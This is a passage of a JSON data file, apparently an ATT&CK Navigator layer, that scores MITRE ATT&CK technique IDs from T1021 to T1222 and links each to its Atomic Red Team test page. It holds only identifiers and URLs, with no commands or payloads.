21.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco